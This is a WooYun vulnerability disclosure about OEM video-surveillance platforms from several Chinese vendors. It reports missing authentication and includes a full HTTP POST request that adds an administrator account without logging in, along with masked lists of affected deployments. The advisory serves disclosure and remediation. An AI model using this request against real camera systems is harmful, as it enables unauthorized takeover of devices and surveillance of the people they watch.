当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0182770

漏洞标题:某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

相关厂商:某OEM安防监控

漏洞作者: 路人甲

提交时间:2016-03-10 12:20

修复时间:2016-06-12 16:00

公开时间:2016-06-12 16:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-10: 细节已通知厂商并且等待厂商处理中
2016-03-14: 厂商已经确认,细节仅向厂商公开
2016-03-17: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-05-08: 细节向核心白帽子及相关领域专家公开
2016-05-18: 细节向普通白帽子公开
2016-05-28: 细节向实习白帽子公开
2016-06-12: 细节向公众公开

简要描述:

涉及多家厂商

详细说明:

涉及如下公司
大华e眼 版权所有@河南大华安防科技股份有限公司

aaaaaaaaaaaaaaaaaa1111111111111111111111.jpg


华迈千里眼 版权所有@成都华迈通信技术有限公司

aaaaaaaaaaaaaaaa222222222222222222.jpg


鼎世千里眼 版权所有@四川鼎世安防服务有限公司

aaaaaaaaaaaaaaaa3333333333333333.jpg


根据案例.还些产品名称为“翼”貌似与中国.电信合作,还些案例没LOGO(具体型号请登录案例测试)

翼安居.天翼卫士
翼安居 翼安铺
天翼慧眼
189look视频看家

漏洞证明:

根据互联网案例测试发现部分产品未开启登录功能(可直接进入监控控制台),而部分产品开启了登录功能可利用post包直接添加任意管理员(无需登录,全局功能未授权访问导致)。

POST /cn/base/cgi-bin/login.cgi?save HTTP/1.1
Host: 地址
Content-Length: 249
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: keyenable=; login_level=0
Connection: close
keyenable=1&username=admin&password=wooyun&group=0&name1=&pwd1=&group1=2&name2=&pwd2=&group2=2&name3=&pwd3=&group3=2&name4=&pwd4=&group4=2&name5=&pwd5=&group5=2&name6=&pwd6=&group6=2&name7=&pwd7=&group7=2&name8=&pwd8=&group8=2&name9=&pwd9=&group9=2


aaaaaaaaaaaaaaaaaa44444444444444444444.jpg


aaaaaaaaaaaaaaaaa55555555555555555.jpg


aaaaaaaaaaaaaaaaaaa666666666666666666.jpg


aaaaaaaaaaaaa7777777777777777777.jpg


案例:

以下案例需登录验证(可利用post包直接添加管理员):
**.**.**.**/cn/
**.**.**.**/en/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**:83/cn/
**.**.**.**:82/cn/
**.**.**.**:82/cn/
**.**.**.**/cn/
**.**.**.**:82/cn/
**.**.**.**:81/cn/
**.**.**.**:81/cn/
**.**.**.**:81/cn/
**.**.**.**/cn/
**.**.**.**:82/cn/
**.**.**.**:82/cn/
**.**.**.**:81/cn/
**.**.**.**:100/cn/
**.**.**.**:8081/cn/
**.**.**.**:81/cn/
以下案例未开启登录验证功能直接可进控制台:
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**:100/cn/     华迈千里眼see1000 
**.**.**.**:81/cn/
**.**.**.**:89/cn/
**.**.**.**:81/cn/
**.**.**.**:88/cn/
**.**.**.**:81/cn/
**.**.**.**/cn/
**.**.**.**:81/cn/
**.**.**.**/cn/
**.**.**.**:100/cn/
**.**.**.**:100/cn/
**.**.**.**:81/cn/    大华e眼 远程视频监控系统运营服务平台
**.**.**.**/cn/     翼安居.天翼卫士
**.**.**.**/cn/    翼安居 翼安铺
**.**.**.**/cn/
**.**.**.**:8090/cn/
**.**.**.**:82/cn/
**.**.**.**/cn/     鼎世千里眼
**.**.**.**:85/cn/
**.**.**.**:81/cn/         189look视频看家
**.**.**.**/cn/
**.**.**.**:81/cn/
**.**.**.**:84/cn/
**.**.**.**/cn/           天翼慧眼
**.**.**.**/cn/
**.**.**.**:81/cn/
**.**.**.**:8081/cn/
**.**.**.**/cn/
**.**.**.**:81/cn/
**.**.**.**/cn/
**.**.**.**:100/cn/
**.**.**.**:100/cn/
**.**.**.**:85/cn/

修复方案:

联系厂商

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2016-03-14 15:57

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无